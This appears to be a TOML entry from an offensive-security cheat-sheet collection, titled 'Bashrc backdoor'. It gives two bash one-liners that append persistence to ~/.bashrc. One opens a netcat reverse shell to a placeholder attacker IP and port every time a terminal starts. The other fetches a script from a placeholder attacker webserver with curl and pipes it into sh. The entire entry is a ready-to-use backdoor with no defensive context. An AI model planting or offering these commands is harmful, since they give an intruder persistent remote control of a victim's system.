title = "Bashrc backdoor"
description = "Get a reverse shell everytime a new terminal session is started"
tags = ["linux", "backdoor", "bash"]
source = []

[[data]]
description = ""
language = "bash"
command = """echo 'mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f' >> ~/.bashrc"""

[[data]]
description = "Example executing remote commands via http:"
language = "bash"
command = """echo 'curl -sk https://<attacker-webserver.com>/script.sh | sh' >> ~/.bashrc"""
